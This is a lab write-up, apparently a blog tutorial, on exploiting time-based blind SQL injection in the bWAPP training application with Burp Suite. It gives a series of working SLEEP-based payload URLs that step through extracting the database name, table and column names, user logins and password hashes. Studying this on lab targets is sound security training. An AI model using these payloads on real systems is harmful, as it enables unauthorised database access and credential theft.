In this post we will try to exploit the Time-based blind SQLi. I will only give the final query and final output from the query it is same as that of boolean-based blind SQLi ony difference if condition is true we will ask database(application) to sleep/delay for mentioned time.
Open the bwapp 2.2 and visit the page “SQL Injection — Blind — Time-Based” as shown below. The functionality is same which search if movie present in database or not.
Now lets start the burp suite proxy and use the embedded browser. I forward the normal request to the repeater.
Now let’s check if this is vulnerable to time based SQLi. I used the payload “IRON MAN’ AND SLEEP(10) — “, If the movie is present then the response will take 10 seconds to come back.
Let’s try what if movie is not in the database and we ask the database to sleep for 10 seconds.
The movie is not in database and hence there is no time delay.
The above steps proved that the application is vulnerable to time based SQLI.
Now lets first try to find the name of current database, for this I will use burp’s intruder functionality. Hope you know the steps to use it.
From intruder’s result we I can say that the length of the name of database is 5. The query in the repeater looks like below.
Now we know the length of the name of the database, let’s try to find the name of the database.
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+database())+LIKE+"bwapp%",SLEEP(10),NULL)+--+&action=search
Now let’s find out the number of tables in the database.
After this we must know the name of tables in the database. For that I will use LIMIT clause did before.
Length of name of first table is 4:
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+LENGTH(table_name)+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+0,1)=4,SLEEP(10),NULL)+--+&action=search
Length of name of second table is 6:
Length of name of third table is 6:
Length of name of fourth table is 5:
Length of name of fifth table is 8:
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+LENGTH(table_name)+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+4,1)=8,SLEEP(10),NULL)+--+&action=search
After this, we need to find the name of each table.
First table is: blogs
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+0,1)+LIKE+"blog%",SLEEP(10),NULL)+--+&action=search
Second table is: heroes
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+1,1)+LIKE+"heroe%",SLEEP(10),NULL)+--+&action=search
Third table is: movies
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+2,1)+LIKE+"movies%",SLEEP(10),NULL)+--+&action=search
Fourth table is: users
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+3,1)+LIKE+"users%",SLEEP(10),NULL)+--+&action=search
Fifth table is: visitors
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+table_name+FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+4,1)+LIKE+"visitors%",SLEEP(10),NULL)+--+&action=search
We have name of all five tables, we are interested in “users” table. For extracting data, we should know the number of columns in users.
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+count(*)+FROM+information_schema.columns+WHERE+table_schema=database()+AND+table_name='users')=9,SLEEP(10),NULL)+--+&action=search
There are 9 columns in users table. Now we need to find the length of name of each column. We will do that with limit clause again.
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+LENGTH(column_name)+FROM+information_schema.columns+WHERE+table_schema=database()+AND+table_name='users'+LIMIT+0,1)=2,SLEEP(10),NULL)+--+&action=search
Similarly by changing LIMIT clause, we are able to extract the length of each column name in users table.
After that, we need to find the name of columns.I am able to find the column names as below.
Now we know the column names, we are interested in login and password. The length of login for first user can be find with:
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+LENGTH(login)+FROM+users+LIMIT+0,1)=6,SLEEP(10),NULL)+--+&action=search
The length of login for second user can be find with:
Now lets find the login name. The final queries for first and second users are:
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+login+FROM+users+LIMIT+0,1)+LIKE+"a.i.m.%",SLEEP(10),NULL)+--+&action=search
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+login+FROM+users+LIMIT+1,1)+LIKE+"bee%",SLEEP(10),NULL)+--+&action=search
So we have user names, now we need to find the password for these users. Using below query we can able to find the hash of the password.
http://192.168.1.27/bWAPP/sqli_15.php?title=IRON+MAN%27+AND+IF((SELECT+password+FROM+users+LIMIT+0,1)+LIKE+"68%",SLEEP(10),NULL)+--+&action=search
We need to change the characters in LIKE clause using intruder and find the whole hash for user one. For another user, update 0 in LIMIT clause with 1 and do the same procedure.
This way we are able to exploit the Time-based blind sql injection.
Hope you like the whole series.